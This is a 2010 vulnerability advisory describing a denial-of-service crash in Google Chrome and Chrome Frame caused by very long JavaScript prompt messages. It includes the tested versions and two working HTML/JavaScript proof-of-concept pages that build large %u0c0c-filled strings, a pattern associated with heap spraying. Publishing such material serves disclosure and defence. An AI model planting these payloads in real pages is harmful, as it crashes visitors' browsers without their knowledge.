###############################################
Google Chrome and Chrome Frame Prompt DoS
Vendor URL: http://www.google.com
Advisory: http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Advisory (Spanish): http://rootdev.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Vendor notified: YES    Exploit available: YES
###############################################
This bug was discovered by me, and I have tested it
and investigated it with Climbo from #ayuda-informaticos
on the irc-hispano channel.
#########
Abstract
#########
Sometimes web applications need to prompt users for some data;
they can prompt via JavaScript code or via HTML forms.
In the case of JavaScript prompts, what happens if
the data to prompt (the question) is very long?
################
Google Chrome is prone to a denial of service
condition via "alert prompts" when the message passed is very long.
I don't know if this can be turned into remote code execution or
memory corruption with a heap spray or similar, but I think
that this needs to be analysed and patched.
###################
Versions Tested
###################
In all cases Chrome is the vector used to do
something on every system :)
######################
MAC OS X leopard 10.5
######################
Google Chrome 5.0.375.126 (Official Build 53802) WebKit 533.4
V8 2.1.10.15
User Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US)
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4
Command Line: /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818
In all cases OS X closes all Chrome windows (Chrome crashes).
##############
Ubuntu 10.04
##############
Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04
WebKit 533.4
V8 2.1.10.14
User Agent: Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4
Command Line: /usr/lib/chromium-browser/chromium-browser
In all cases Chrome is minimized and denies access to the
window manager buttons, and we cannot switch between the applications
that we have open.
##################
Windows 7 32 bits
###################
Google Chrome 5.0.375.86 (Official Build 49890)
on Windows 7 Ultimate, fully patched.
It causes a DoS in Chrome, and a DoS in IE8 when
exploited through Google Chrome Frame.
###############
Debian 2.6.26
###############
Google Chrome 6.0.472.25 (Official Build 55113) dev, WebKit 534.3
V8 2.2.24.11
User Agent: Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3
In all cases Debian closes all Chrome windows (Chrome crashes).
####################
Proof of Concept
####################
This PoC is for testing on Win7 32 bits with Chrome,
and with Chrome Frame in conjunction with IE8, where it causes
a DoS in IE8.
#############################
<meta http-equiv="X-UA-Compatible" content="chrome=1">
<h1> wait 10 or 11 seconds :)</h1>
<script>
// Double the payload until it is at least len characters long,
// then cut it to exactly len characters.
function do_buffer(payload, len) {
    while (payload.length < (len * 2)) payload += payload;
    payload = payload.substring(0, len);
    return payload;
}
// Open a prompt dialog whose message is a 38000-character string.
function DoS() {
    var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 38000);
    prompt(buffer);
}
setTimeout(DoS, 1000);
</script>
################# EOF ###################
This second PoC is for testing on Linux or Mac OS X.
#######################################
<h1> wait 10 or 11 seconds :)</h1>
<script>
// Double the payload until it is at least len characters long,
// then cut it to exactly len characters.
function do_buffer(payload, len) {
    while (payload.length < (len * 2)) payload += payload;
    payload = payload.substring(0, len);
    return payload;
}
// Open a prompt dialog whose message is a 50000-character string.
function DoS() {
    var buffer = do_buffer(unescape('%u0c0c%u0c0c'), 50000);
    prompt(buffer);
}
setTimeout(DoS, 1000);
</script>
################# EOF ###################
############
References
############
Related vulnerability:
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html
Google Chrome bug tracker:
http://code.google.com/p/chromium/issues/detail?id=47617
################### €nd ###################
Thanks to Climbo for his patience and support.
Sincerely,
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....